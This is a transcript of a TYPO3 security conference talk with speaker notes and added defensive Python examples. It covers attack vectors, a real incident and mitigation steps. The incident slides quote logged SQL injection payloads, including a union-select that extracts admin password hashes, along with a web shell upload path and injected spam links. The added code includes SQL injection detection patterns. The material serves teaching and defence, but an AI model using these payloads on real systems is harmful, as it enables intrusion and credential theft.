Slides 46-74 (bullets ending in "..." are cut off in the source)

Slide 46: Knowing the Enemy: 15 minutes later: Log in as admin!
14:21:48: /typo3/index.php
14:21:50: /typo3/backend.php
Slide 47: Knowing the Enemy: Uploading web shell
14:22:32: /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/typo3conf/ext/...
Slides 48-53: Knowing the Enemy: Conclusion
* Hackers know what they are doing
* They know TYPO3 very well
* They also use automated tools...
Slide 54: Mitigation
Slides 55-60: Mitigation: Mandatory steps
* Monitor and Back Up your Website
* Read the announce Mailing list and bulletins carefully
* U...
Slides 61-65: Mitigation: Advanced steps
* Use TYPO3 Core features in favour of extensions
* Use protected backend access
* Consider using ...
Slide 66: TYPO3 Security Team
Slides 67-71: TYPO3 Security Team: Important things to know
* Responsible Disclosure Policy
* One communication channel (security@typo3.or...
Slide 72: Resources
* PHP-Sicherheit (Christopher Kunz and Stefan Esser)
* Essential PHP Secu...
Slide 73: Questions?
Slide 74: Thank You!
Speaker notes

Agenda: Interrupt me immediately if you have questions.

What is Security? Web application security, not personal nor governmental security. Nevertheless there are similarities, which I use to explain. Why is it important to define?

Is TYPO3 secure? It depends ;)

Criteria for Security:
* Private things are kept private: walking in the house naked; customer data not exposed.
* Nothing can be stolen: your TV is still there when you return home and it is still working; bank accounts, vouchers etc.
* Nobody can use your "subject" for any other purpose than the one you intended: nobody sleeps in your bed or uses your internet connection for committing crime etc.; the website is running and does not display SPAM links.

Security is a process:
* Caretaking: replace broken, non-working locks; don't use simple 3-number locks, not even for your oldest bike. As hackers, hacker tools and computing power evolve, so the security concepts have to. Have an established security handling workflow.
* Your needs: do you live in a small village in Canada or in New York (special bike lock)? Are you a bank or just showing your goldfish breed on a website? The security efforts must relate to the possible impact: resources invested in security versus the potential loss when hacked. If the effort to be hacked exceeds the gain, your system is secure.
* Nothing is secure by definition: the security of an application must be proven over time.

Why TYPO3 can be considered not insecure:
* Caretaking: all issues are handled by the Security Team. No 0-day exploits so far; everything (core) has been reported to us beforehand. New security features are being implemented (saltedpasswords, rsaauth).
* Your needs: TYPO3 is highly customizable (login services, plugins etc.), e.g. a health information platform with encrypted webservice data (the password hash is the key).
* Few critical security issues over time, handled fast and reliably by the Security Team.

General Security Concepts:
* Defense in depth: onion principle. Fence, front door, curtains, bathroom/bedroom doors, password for your computer, safe. (Physical access,) firewall (network), OS, WAF, webserver (Apache), PHP (Suhosin), application (e.g. TYPO3).
* Minimize exposure / least privilege: activate only needed services (extensions) (OS, Apache, TYPO3); turn off your WiFi when not at home.
* Obscurity: keys below the stone or above the door; e.g. an alternate telnet port, or a database export in the document root with a "secret" name.
* Log: even helpful _after_ an incident. Cameras (laptop theft software). Apache and TYPO3 logs: keep them in a safe place (not writable by the webserver/PHP user) if possible.

Knowing the Enemy, conclusion:
* Automated tools: LizaMoon.
* Obfuscate: Google conditional attack.
* Gain: even "small websites" are targeted.

Mitigation, mandatory steps:
* Monitoring: suspicious activity/load on the server.
* Up-to-date software: OS, PHP, TYPO3, extensions.

Mitigation, advanced steps:
* TYPO3 Core features: much better maintained and a better codebase.
* Protected backend: NO FTP!, SSL, protect with HTTP auth (only certain IPs).

TYPO3 Security Team:
* Responsible disclosure: publish the issue together with a fix (may take some time).
* Communication: everything you suspect to be security-related, let us know!
* Pre-announcement: if no pre-announcement is made, the issue is not critical. We try to release in the first half of the week (mostly Tuesday).
* Support: good reports; send friendly reminders; donate money.
  • Transcript of "TYPO3 Security - Risks and Mitigation"

    1. 1. TYPO3 Conference - San Francisco 2011 InspiringTYPO Security - Risks and Mitigation sha
    2. 2. T3CON11 San Francisco TYPO Security - Risks and Mitigation 10.06.2011Helmut Hummel <helmut.hummel@typo3.org>
    3. 3. IntroductionAbout me Involved in TYPO3 project since 2005 Member of the TYPO3 Security Team since 2008 TYPO3 Security Team Leader since 2009 TYPO3 Core Team Member since 2011 Employed at naw.info in Hannover, Germany Twitter: helhum Blog: http://www.naw.info/blogs/typo3security/ Inspiring people toTYPO Security - Risks and Mitigation share
    4. 4. TYPO Security - Risks and MitigationAgenda What is Security? General Security Concepts Attack Vectors Knowing the Enemy: A Case Story Mitigation TYPO3 Security Team Inspiring people toTYPO Security - Risks and Mitigation share
    5. 5. What is Security? Inspiring people toTYPO Security - Risks and Mitigation share
    6. 6. Is TYPO3 secure? Is my TYPO3 Site secure? Inspiring people toTYPO Security - Risks and Mitigation share
    7. 7. What is Security?Criteria for Security Inspiring people toTYPO Security - Risks and Mitigation share
    8. 8. What is Security?Criteria for Security Privacy Inspiring people toTYPO Security - Risks and Mitigation share
    9. 9. What is Security?Criteria for Security Privacy Integrity and Property Inspiring people toTYPO Security - Risks and Mitigation share
    10. 10. What is Security?Criteria for Security Privacy Integrity and Property Availability and Intentional Use Inspiring people toTYPO Security - Risks and Mitigation share
    11. 11. Security is a process, not a product. (Bruce Schneier) Inspiring people toTYPO Security - Risks and Mitigation share
    12. 12. What is Security?Security is a process Inspiring people toTYPO Security - Risks and Mitigation share
    13. 13. What is Security?Security is a process Care taking and improvements over time Inspiring people toTYPO Security - Risks and Mitigation share
    14. 14. What is Security?Security is a process Care taking and improvements over time Depending on your needs Inspiring people toTYPO Security - Risks and Mitigation share
    15. 15. What is Security?Security is a process Care taking and improvements over time Depending on your needs Nothing is secure! Something can only be not insecure at a particular time Inspiring people toTYPO Security - Risks and Mitigation share
    16. 16. What is Security?Why TYPO3 can be considered to be notinsecure Inspiring people toTYPO Security - Risks and Mitigation share
    17. 17. What is Security?Why TYPO3 can be considered to be notinsecure TYPO3 Security Team takes care Inspiring people toTYPO Security - Risks and Mitigation share
    18. 18. What is Security?Why TYPO3 can be considered to be notinsecure TYPO3 Security Team takes care Highly customizable for your needs Inspiring people toTYPO Security - Risks and Mitigation share
    19. 19. What is Security?Why TYPO3 can be considered to be notinsecure TYPO3 Security Team takes care Highly customizable for your needs Few critical Security issues over time Inspiring people toTYPO Security - Risks and Mitigation share
    20. 20. General Security Concepts Inspiring people toTYPO Security - Risks and Mitigation share
    21. 21. General Security ConceptsGeneral Security Concepts Inspiring people toTYPO Security - Risks and Mitigation share
    22. 22. General Security ConceptsGeneral Security Concepts Defense in depth Inspiring people toTYPO Security - Risks and Mitigation share
    23. 23. General Security ConceptsGeneral Security Concepts Defense in depth Minimize Exposure / Least privilege Inspiring people toTYPO Security - Risks and Mitigation share
    24. 24. General Security ConceptsGeneral Security Concepts Defense in depth Minimize Exposure / Least privilege Inspiring people toTYPO Security - Risks and Mitigation share
    25. 25. General Security ConceptsGeneral Security Concepts Defense in depth Minimize Exposure / Least privilege Do not rely on security by obscurity Inspiring people toTYPO Security - Risks and Mitigation share
    26. 26. General Security ConceptsGeneral Security Concepts Defense in depth Minimize Exposure / Least privilege Do not rely on security by obscurity Log Activities Inspiring people toTYPO Security - Risks and Mitigation share
    27. 27. Attack Vectors Inspiring people toTYPO Security - Risks and Mitigation share
    28. 28. Attack VectorsAttack Vectors Inspiring people toTYPO Security - Risks and Mitigation share
    29. 29. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Inspiring people toTYPO Security - Risks and Mitigation share
    30. 30. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Inspiring people toTYPO Security - Risks and Mitigation share
    31. 31. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Inspiring people toTYPO Security - Risks and Mitigation share
    32. 32. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Inspiring people toTYPO Security - Risks and Mitigation share
    33. 33. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Compromised PC with FTP access Inspiring people toTYPO Security - Risks and Mitigation share
    34. 34. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Compromised PC with FTP access Other Software on the webserver Inspiring people toTYPO Security - Risks and Mitigation share
    35. 35. Knowing the Enemy Inspiring people toTYPO Security - Risks and Mitigation share
    36. 36. Knowing the EnemyThe incident, how did it happen? <div style="display:none;"><a href="http://totiyaso.tripod.com/jovian-v251-for-palmos- crack.html">Jovian v2.5.1 for PalmOS Crack</a> <a href="http://tarajoz.tripod.com/clickomania-21-for- palmos-crack.html">Clickomania 2.1 for PalmOS Crack</a> <a href="http://mujaciya.tripod.com/ ollydbg-110-xp-crack.html">OllyDbg 1.10 XP Crack</a> <a href="http://loyobusi.tripod.com/infograph- infocad-v651b-crack.html">InfoGraph InfoCAD v6.51b Crack</a> <a href="http://nisexufo.tripod.com/ customizer-xp-v15-by-tnt-crack.html">Customizer XP v1.5 by TNT Crack</a> <a href="http:// yajegoco.tripod.com/gw3dfeatures-for-solidworks-v5-crack.html">GW3Dfeatures For SolidWorks v5 Crack</ a> <a href="http://lebuvoxo.tripod.com/regrun-ii-v291-crack.html">RegRun II v2.91 Crack</a> <a href="http://ziziquy.tripod.com/stuffit-standard-v852165-crack.html">StuffIt Standard v8.5.2.165 Crack</a> <a href="http://ziziquy.tripod.com/glu3d-v1308-for-3dsmax-7-crack.html">Glu3D v1.3.08 for 3dsmax 7 Crack</a> <a href="http://yucayibu.tripod.com/cpukiller-v20-serial-by-tnt- crack.html">CPUKILLER v2.0 Serial by TNT Crack</a> <a href="http://fimegipo.tripod.com/microangelo- v55-by-aaocg-crack.html">Microangelo v5.5 by AAOCG Crack</a> <a href="http://loyobusi.tripod.com/ restoreit-deluxe-edition-v301-crack.html">RestoreIT! 
Deluxe Edition v3.01 Crack</a> <a href="http:// tomuxeq.tripod.com/abbyy-scanto-office-v10-crack.html">ABBYY ScanTo Office v1.0 Crack</a> <a href="http://besiluho.tripod.com/anno-domini-2002-v106-build-1-crack.html">Anno Domini 2002 v1.06 build 1 Crack</a> <a href="http://yepimal.tripod.com/serious-sam-2-plus-5-trainer-crack.html">SERIOUS SAM 2 PLUS 5 TRAINER Crack</a> <a href="http://vihuseya.tripod.com/pe-corrector-v166-by-fff- crack.html">PE Corrector v1.66 by FFF Crack</a> <a href="http://tarajoz.tripod.com/teenswebbrowser- bounce-10-crack.html">teensWebBrowser Bounce 1.0 Crack</a> <a href="http://loyobusi.tripod.com/bb- password-manager-v1011-crack.html">BB Password Manager v1.0.1.1 Crack</a> <a href="http:// reyabade.tripod.com/calendar-wizard-v2014a-crack.html">Calendar Wizard v2.0.14a Crack</a> <a href="http://gezuvak.tripod.com/1-act-personal-firewall-2006-crack.html">1-ACT Personal Firewall 2006 Crack</a> <a href="http://fimegipo.tripod.com/system-locker-112f-by-dbc-crack.html">System Locker 1.12f by DBC Crack</a> <a href="http://sehuxogo.tripod.com/nidesoft-dvd-ripper-v3062- crack.html">Nidesoft DVD Ripper v3.0.62 Crack</a> <a href="http://ziziquy.tripod.com/clonecd-v4331-by- tsrh-crack.html">CloneCD v4.3.3.1 by TSRH Crack</a> <a href="http://tihuqap.tripod.com/icon-sucker-2- pro-210072-crack.html">Icon Sucker 2 Pro 2.10.072 Crack</a> <a href="http://coqoxole.tripod.com/ primasoft-internet-optimizer-crack.html">PrimaSoft Internet Optimizer Crack</a> <a href="http:// fimegipo.tripod.com/fairstars-recorder-v201-crack.html">FairStars Recorder v2.01 Crack</a> <a href="http://nekuqoj.tripod.com/email-validation-for-net-v20crack.html">Email Validation for NET v2.0Crack</a> <a href="http://xocedeqi.tripod.com/mathworks-matlab-r2006b-3-cds-crack.html">Mathworks Matlab R2006b (3 cds) Crack</a> <a Inspiring people toTYPO Security - Risks and Mitigation share
37. Knowing the Enemy: Searching for vulnerabilities
178.122.0.0 - - [17/Dec/2010:14:01:43 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93 HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
38. Knowing the Enemy: Searching for vulnerabilities
178.122.0.0 - - [17/Dec/2010:14:02:30 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+ HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
39. Knowing the Enemy: Searching for vulnerabilities
14:03:09: tx_galleryexample_pi2[uid]=1192&tx_galleryexample_pi2[year]=2010
40. Knowing the Enemy: Searching for vulnerabilities
14:03:21: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010
41. Knowing the Enemy: Searching for vulnerabilities
14:03:42: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010
42. Knowing the Enemy: Searching for vulnerabilities
14:04:15: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 --
43. Knowing the Enemy: Found something!
14:04:38: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 order by 10 --
44. Knowing the Enemy: Forging the exploit
14:08:38: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 --
45. Knowing the Enemy: Exploit working!
14:09:04: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=-2010 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat(concat_ws(0x3a3a,username,password,admin)),20,21,22 from be_users where admin=1 --
Now the hacker has the md5 hashes of all admin passwords.
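Why the `year` parameter could be taken over, as an added Python example (not code from the talk or from the gallery extension, which is PHP): on the vulnerable path the request value is pasted into the SQL text, so the probe value from slide 42 silently comments away whatever follows it, which is what told the attacker the parameter reaches the query; the hardened path casts to an integer and binds placeholders, and the same value is refused. The table name, columns and rows are constructed for this example, not taken from any extension.

```python
import sqlite3

# Added example, not from the talk. Reproduces in Python/sqlite3 the mistake
# shown in the slides (request parameters concatenated into SQL) next to the
# fixed form. Table and row contents are constructed for the example.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE tx_galleryexample_item (uid INTEGER, year INTEGER, title TEXT, hidden INTEGER);
        INSERT INTO tx_galleryexample_item VALUES (979, 2010, 'holiday', 0);
        INSERT INTO tx_galleryexample_item VALUES (979, 2010, 'draft', 1);
        INSERT INTO tx_galleryexample_item VALUES (979, 2009, 'winter', 0);
    """)
    return conn


def vulnerable_query(conn, uid, year):
    """Request values concatenated into the SQL text: the injectable pattern."""
    sql = ("SELECT title FROM tx_galleryexample_item "
           f"WHERE uid={uid} AND year={year} AND hidden=0")
    # A value like '2010 --' turns 'AND hidden=0' into a comment.
    return sorted(row[0] for row in conn.execute(sql))


def hardened_query(conn, uid, year):
    """Strict integer cast plus bound parameters; bad input raises ValueError."""
    uid_int = int(uid)      # int('2010 --') raises ValueError
    year_int = int(year)
    return sorted(row[0] for row in conn.execute(
        "SELECT title FROM tx_galleryexample_item "
        "WHERE uid=? AND year=? AND hidden=0",
        (uid_int, year_int)))


def is_rejected(conn, uid, year):
    """True when the hardened path refuses the input instead of querying."""
    try:
        hardened_query(conn, uid, year)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query(db, "979", "2010"))      # ['holiday']
    print(vulnerable_query(db, "979", "2010 --"))   # ['draft', 'holiday']: hidden filter commented out
    print(hardened_query(db, "979", "2010"))        # ['holiday']
    print(is_rejected(db, "979", "2010 --"))        # True
```

The integer cast is the one-line equivalent of what the extension should have done with `uid` and `year`; binding the values as parameters is the general fix that also covers string columns.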
46. Knowing the Enemy: 15 minutes later: Log in as admin!
14:21:48: /typo3/index.php
14:21:50: /typo3/backend.php
47. Knowing the Enemy: Uploading web shell
14:22:32: /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/typo3conf/ext/realurlmanagement/
14:22:46: /typo3conf/ext/realurlmanagement/title.php
You lose!
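The whole sequence above (probing, backend login, upload into typo3conf/ext) is visible in the ordinary web server log, and it can be triaged automatically. The following is an added Python example, not part of the talk: it parses combined-format access log lines, decodes the query string, flags the SQL injection indicators the slides show, and raises the severity for an IP whose probes are followed by backend access or an extension upload. The sample log is constructed after the format on slides 37 and 38; the second IP, status codes and sizes are made up.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log (added example, not from the talk). IP, paths and
# timestamps follow the slides; 10.0.0.5, status codes and sizes are invented.
SAMPLE_LOG = """\
178.122.0.0 - - [17/Dec/2010:14:01:43 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93 HTTP/1.1" 200 54383 "-" "Opera/9.80"
178.122.0.0 - - [17/Dec/2010:14:02:30 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select+1,2,3+--+ HTTP/1.1" 200 54383 "-" "Opera/9.80"
178.122.0.0 - - [17/Dec/2010:14:04:38 +0100] "GET http://www.example.com/gallery/?tx_galleryexample_pi2%5Buid%5D=979&tx_galleryexample_pi2%5Byear%5D=2010+order+by+10+-- HTTP/1.1" 200 31000 "-" "Opera/9.80"
10.0.0.5 - - [17/Dec/2010:14:05:00 +0100] "GET http://www.example.com/gallery/?tx_galleryexample_pi2%5Buid%5D=979&tx_galleryexample_pi2%5Byear%5D=2010 HTTP/1.1" 200 31000 "-" "Mozilla/5.0"
178.122.0.0 - - [17/Dec/2010:14:21:48 +0100] "POST /typo3/index.php HTTP/1.1" 302 0 "-" "Opera/9.80"
178.122.0.0 - - [17/Dec/2010:14:22:32 +0100] "POST /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/typo3conf/ext/realurlmanagement/ HTTP/1.1" 200 512 "-" "Opera/9.80"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) ')

# Indicators taken from the requests on the slides, applied to decoded values.
SQLI_PATTERNS = [
    re.compile(r"\bunion\b.+\bselect\b", re.I),
    re.compile(r"\border\s+by\s+\d+", re.I),
    re.compile(r"\bgroup_concat\s*\(", re.I),
    re.compile(r"--\s*$"),              # trailing SQL comment terminator
]


def parse_line(line):
    """Return ip, timestamp, path and decoded query parameters, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def sqli_indicators(params):
    """List human-readable hits for a decoded (key, value) parameter list."""
    hits = []
    for key, value in params:
        for pat in SQLI_PATTERNS:
            if pat.search(value):
                hits.append(f"{key}: matches {pat.pattern!r}")
                break
        # Assumption for this example: [uid] and [year] parameters are plain integers.
        if re.search(r"\[(uid|year)\]$", key) and not re.fullmatch(r"-?\d+", value.strip()):
            hits.append(f"{key}: non-integer value {value!r}")
    return hits


def triage(log_text):
    """Per-IP findings; severity is raised when probing precedes backend use."""
    events = defaultdict(list)      # ip -> [(kind, timestamp, detail)]
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = sqli_indicators(rec["params"])
        if hits:
            events[rec["ip"]].append(("sqli_probe", rec["ts"], "; ".join(hits)))
        if rec["path"].startswith("/typo3/"):
            events[rec["ip"]].append(("backend_access", rec["ts"], rec["path"]))
        if rec["path"].startswith("/typo3conf/ext/") and ("action", "upload") in rec["params"]:
            events[rec["ip"]].append(("extension_upload", rec["ts"], rec["url"]))
    findings = {}
    for ip, evs in events.items():
        kinds = [kind for kind, _, _ in evs]
        severity = "low"
        if "sqli_probe" in kinds:
            severity = "medium"
            # Probing followed by backend access or an upload into typo3conf/ext
            # is the incident's pattern: treat as likely compromise.
            if "backend_access" in kinds or "extension_upload" in kinds:
                severity = "high"
        findings[ip] = {"severity": severity, "events": evs}
    return findings


if __name__ == "__main__":
    for ip, finding in triage(SAMPLE_LOG).items():
        print(ip, finding["severity"])
        for kind, ts, detail in finding["events"]:
            print("  ", ts, kind, detail)
```

The script only reports; it is meant for post-hoc triage or as the seed for a monitoring rule, which is what the "Monitor your Website" step in the mitigation slides asks for. An ordinary admin who logs in without any preceding probes stays at "low" and is never reported as a probe.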
48-53. Knowing the Enemy: Conclusion
- Hackers know what they are doing
- They know TYPO3 very well
- They also use automated tools
- They often try to obfuscate the hack
- With automated attacks effort is low, gain is high
54. Mitigation
55-60. Mitigation: Mandatory steps
- Monitor and back up your website
- Read the announce mailing list and bulletins carefully
- Use up-to-date software
- Use saltedpasswords and advise your admins (and users) to use non-obvious passwords
- Make your integrators aware of possible TypoScript problems
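What the saltedpasswords step buys you, as an added Python example that is not part of the talk and does not reproduce the extension's own hashing scheme: the incident ended with the attacker holding unsalted md5 hashes of every admin password, and such hashes are the same for equal passwords and can be checked against precomputed tables. A per-user random salt and an iterated hash (PBKDF2-SHA256 here, chosen for the example) remove both properties, and verification uses a constant-time comparison.

```python
import hashlib
import hmac
import os

# Added example, not the saltedpasswords extension's algorithm. Illustrates
# salted, iterated hashing next to the unsalted md5 the incident exposed.
ITERATIONS = 100_000


def legacy_md5(password):
    """Unsalted md5 as found in the incident: equal passwords, equal hashes."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password, salt=None):
    """Return '$pbkdf2-sha256$<iterations>$<salt hex>$<digest hex>'."""
    salt = salt or os.urandom(16)           # fresh random salt per stored password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"$pbkdf2-sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _, algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2-sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    # Constructed sample password; two admins choosing the same one.
    print(legacy_md5("correct horse") == legacy_md5("correct horse"))   # True: identical rows leak equality
    first = hash_password("correct horse")
    second = hash_password("correct horse")
    print(first != second)                                           # True: salts differ
    print(verify_password("correct horse", first))                   # True
    print(verify_password("wrong", first))                           # False
```

Stolen salted, iterated hashes still have to be treated as a compromise of those accounts, but they no longer let an attacker log in fifteen minutes later the way the slide 46 timeline shows; rotating the passwords after an incident remains necessary either way.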
61-65. Mitigation: Advanced steps
- Use TYPO3 Core features in favour of extensions
- Use protected backend access
- Consider using mod_security
- Consider using the phpids TYPO3 extension
66. TYPO3 Security Team
67-71. TYPO3 Security Team: Important things to know
- Responsible Disclosure Policy
- One communication channel (security@typo3.org)
- Pre-announcements for critical issues only
- You can support us
72. TYPO Security - Risks and Mitigation: Resources
- PHP-Sicherheit (Christopher Kunz and Stefan Esser)
- Essential PHP Security (Chris Shiflett)
- http://www.owasp.org/
- http://typo3.org/teams/security/security-bulletins/
- http://typo3.org/teams/security/resources/
- http://buzz.typo3.org/teams/security/
73. Questions?
74. Thank You!
75. inspiring people to share.